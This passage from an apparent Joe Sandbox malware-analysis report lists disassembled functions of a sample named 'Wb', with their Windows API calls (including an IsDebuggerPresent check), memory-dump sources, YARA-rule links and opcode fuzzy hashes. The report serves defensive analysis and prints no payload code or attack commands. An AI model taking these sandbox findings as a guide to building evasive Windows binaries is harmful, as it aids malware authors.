                                                                                                                                                                                                                                                                                                        • API ID: _wcslen$_strcat
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 306214811-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: cb9f0be797eeee546496cafb0f544d4d9a1a0a875485c515af637fac728ea6d0
                                                                                                                                                                                                                                                                                                        • Instruction ID: 5e96165f44e6053778f16c7ec81b168fce5ef65c8632d3750eb83c9622746129
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cb9f0be797eeee546496cafb0f544d4d9a1a0a875485c515af637fac728ea6d0
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 72A16D31600105EFCB18DF58C5D19A9BBE5FF85318B5484ADE88A8F792DB75E941CF80
                                                                                                                                                                                                                                                                                                        Function 00FB2793 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00FB32AF
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB327E: MapVirtualKeyW.USER32(00000010,00000000), ref: 00FB32B7
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB327E: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00FB32C2
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB327E: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00FB32CD
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB327E: MapVirtualKeyW.USER32(00000011,00000000), ref: 00FB32D5
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 00FB32DD
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB3205: RegisterWindowMessageW.USER32(00000004,?,00FB2964), ref: 00FB325D
                                                                                                                                                                                                                                                                                                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00FB2A0A
                                                                                                                                                                                                                                                                                                        • OleInitialize.OLE32 ref: 00FB2A28
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,00000000), ref: 00FF3A0D
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1986988660-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: e3c1b7ca75b7b23e0d9bcae18581d2a23d53e66442afe82a13a3091f88af26bb
                                                                                                                                                                                                                                                                                                        • Instruction ID: 1d05e7aa2c93d0812641dd4fb9fb21c80a8acead58d8ba11471dee316a5e2e62
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e3c1b7ca75b7b23e0d9bcae18581d2a23d53e66442afe82a13a3091f88af26bb
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7771AEB4999200CFC7A8EFAAE96965D3BE1FB58314340412AE4CAC7359EB3A4441DF64
                                                                                                                                                                                                                                                                                                        Function 00FCFCAD Relevance: 4.6, APIs: 3, Instructions: 75timewindowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB61A9: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00FB6299
                                                                                                                                                                                                                                                                                                        • KillTimer.USER32(?,00000001,?,?), ref: 00FCFD36
                                                                                                                                                                                                                                                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00FCFD45
                                                                                                                                                                                                                                                                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0100FE33
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: IconNotifyShell_Timer$Kill
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3500052701-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 79e9c3370b9c8c972a1c287b9c52e5e29d799e796a8a5da4570c8a6881d62416
                                                                                                                                                                                                                                                                                                        • Instruction ID: 90a341a8f7045680b210f2f83a2f53fd7419c0724ae247e00f9d251cc7a691d8
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 79e9c3370b9c8c972a1c287b9c52e5e29d799e796a8a5da4570c8a6881d62416
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F931F971904344AFEB73DF24C895BDBBBEDAB02704F00049ED6DA57282D3741A84DB51
                                                                                                                                                                                                                                                                                                        Function 00FE8A2E Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,00000000,?,?,00FE894C,?,01079CE8,0000000C), ref: 00FE8A84
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00FE894C,?,01079CE8,0000000C), ref: 00FE8A8E
                                                                                                                                                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 00FE8AB9
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2583163307-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: d9c8afe5252b5655d3c84c8b150a00a8dd1c2b241d279a445a18a947dfaa36c9
                                                                                                                                                                                                                                                                                                        • Instruction ID: 4b389a009d75f577c7dd22fb17739f3b776b4fed43c078290b8f759e800b2ae1
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d9c8afe5252b5655d3c84c8b150a00a8dd1c2b241d279a445a18a947dfaa36c9
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D0010833A055E07AC6247276AD85B7E77454B91FB8F29012AF8189B1C2DF3D89827290
                                                                                                                                                                                                                                                                                                        Function 00FE970B Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,00FE97BA,FF8BC369,00000000,00000002,00000000), ref: 00FE9744
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00FE97BA,FF8BC369,00000000,00000002,00000000,?,00FE5ED4,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00FD6F41), ref: 00FE974E
                                                                                                                                                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 00FE9755
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2336955059-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 361de3ef309952cef26e8b102db4d7e2687a1c4246796cb556588fab5761f5b3
                                                                                                                                                                                                                                                                                                        • Instruction ID: 80844a8243d92003133e408d1696c1c0bea8f6acbc480ed63071716f52efcb5d
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 361de3ef309952cef26e8b102db4d7e2687a1c4246796cb556588fab5761f5b3
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 72014C37A24554AFCB159F9ADC45C6E3B2ADB85330B280209FC518B290EA71DD41EBA0
                                                                                                                                                                                                                                                                                                        Function 00FBF238 Relevance: 4.5, APIs: 3, Instructions: 29windowsleepCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • TranslateMessage.USER32(?), ref: 00FBF27B
                                                                                                                                                                                                                                                                                                        • DispatchMessageW.USER32(?), ref: 00FBF289
                                                                                                                                                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FBF29F
                                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(0000000A), ref: 00FBF2B1
                                                                                                                                                                                                                                                                                                        • TranslateAcceleratorW.USER32(?,?,?), ref: 010032D8
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3288985973-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 5dbd8b43615982e801d458e309a00284318cd4304dd08012646d74e9c79499ba
                                                                                                                                                                                                                                                                                                        • Instruction ID: 1af0c12f13996185c4ad27e82a20b2d377e8a562c27f835df57e53b2a1137520
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5dbd8b43615982e801d458e309a00284318cd4304dd08012646d74e9c79499ba
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D0F05E746043849BEB71DBA4DD89FEA77ACBB44350F104928F289870C0EB349088DB26
                                                                                                                                                                                                                                                                                                        Function 00FC2B20 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 00FC3006
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                                                        • String ID: CALL
                                                                                                                                                                                                                                                                                                        • API String ID: 1385522511-4196123274
                                                                                                                                                                                                                                                                                                        • Opcode ID: a24d6fcb7dfec7afaa1c97e8d19320888895897862f2170b777dea9d1666a447
                                                                                                                                                                                                                                                                                                        • Instruction ID: cf4d52d45d6fa88286ef712ec97dc043db42d4adb6ebabca70f6fb58da55bb7b
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a24d6fcb7dfec7afaa1c97e8d19320888895897862f2170b777dea9d1666a447
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5F22A9716082029FD754DF28C981F2ABBF1FF88314F14895DE4868B3A2D776E941EB52
                                                                                                                                                                                                                                                                                                        Function 00FC1990 Relevance: 3.6, APIs: 2, Instructions: 643COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                        • Opcode ID: b7723929dea882cacbd249308ee1d4c5a6680847daa9f1e8d38cbc8db9c68357
                                                                                                                                                                                                                                                                                                        • Instruction ID: 08f568477ea9ddada1dee1414ed39de0cbf5001973d3a2d4580f10368678a58a
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b7723929dea882cacbd249308ee1d4c5a6680847daa9f1e8d38cbc8db9c68357
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F132E270A00206DFEB21DF54CC81FAEB7B6BF05310F048559E9959B292EB36EDA0DB51
                                                                                                                                                                                                                                                                                                        Function 00FB3A95 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetOpenFileNameW.COMDLG32(?), ref: 00FF413B
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FB55D1,?,?,00FF4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00FB5871
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB3A57: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00FB3A76
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Name$Path$FileFullLongOpen
                                                                                                                                                                                                                                                                                                        • String ID: X
                                                                                                                                                                                                                                                                                                        • API String ID: 779396738-3081909835
                                                                                                                                                                                                                                                                                                        • Opcode ID: 304c19a85fae31f1a306c1d0afe80922c3793d318d735a7997099bc5e249641c
                                                                                                                                                                                                                                                                                                        • Instruction ID: 9b3d93ad0860355b3876d20fa7d032b2e31e88048aa002373a800560b3bbde14
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 304c19a85fae31f1a306c1d0afe80922c3793d318d735a7997099bc5e249641c
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A721C071E002589BDB11DF95CC49BEE7BFCAF49310F10801AE544A7281DFBC9A899FA1
                                                                                                                                                                                                                                                                                                        Function 00FB396B Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00FB3A3C
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: IconNotifyShell_
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1144537725-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 842039f47310e4c414c34332e1a42cf0bb4f2be548adb7e9621fe831e6e12cb4
                                                                                                                                                                                                                                                                                                        • Instruction ID: dd118e38677cf5681affa1387244666e7a15ce7d9a72da1e179859902c7075ad
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 842039f47310e4c414c34332e1a42cf0bb4f2be548adb7e9621fe831e6e12cb4
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1331C1B1A047019FD320DF25D8947DBBBE8FB59718F00092EE6D987240E779A948DF52
                                                                                                                                                                                                                                                                                                        Function 00FB331B Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • IsThemeActive.UXTHEME ref: 00FB333D
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB32E6: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00FB32FB
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB32E6: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00FB3312
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB338B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00FB3368,?), ref: 00FB33BB
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB338B: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00FB3368,?), ref: 00FB33CE
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB338B: GetFullPathNameW.KERNEL32(00007FFF,?,?,01082418,01082400,?,?,?,?,?,?,00FB3368,?), ref: 00FB343A
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB338B: SetCurrentDirectoryW.KERNEL32(?,00000001,01082418,?,?,?,?,?,?,?,00FB3368,?), ref: 00FB34BB
                                                                                                                                                                                                                                                                                                        • SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00FB3377
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1550534281-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 2426c86ba19ff86187b2831789e656054b790ae3ef260db50900ba854d2a86a9
                                                                                                                                                                                                                                                                                                        • Instruction ID: 705a2697f47d0dc1b8ce203d618c458a480ee3ae338126a97652dcfd92aa4618
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2426c86ba19ff86187b2831789e656054b790ae3ef260db50900ba854d2a86a9
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 17F0547259C344AFD7206F71EA5AB6937D0A700B19F048819B5C4491CADFBF9151DF40
                                                                                                                                                                                                                                                                                                        Function 00FCF950 Relevance: 3.0, APIs: 2, Instructions: 29sleeptimeCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • timeGetTime.WINMM ref: 00FCF96C
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FBEE50: GetInputState.USER32 ref: 00FBEF07
                                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(00000000), ref: 0100FB22
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: InputSleepStateTimetime
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 4149333218-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 080212c8f39ddedcadee8af51b8c0db4c41c1ef3d3e7bad0f263b56a803750c5
                                                                                                                                                                                                                                                                                                        • Instruction ID: 0577ec12b4129ea6ae605e1961467708a77b2e2b415fbd5d0d6fa34be7227e86
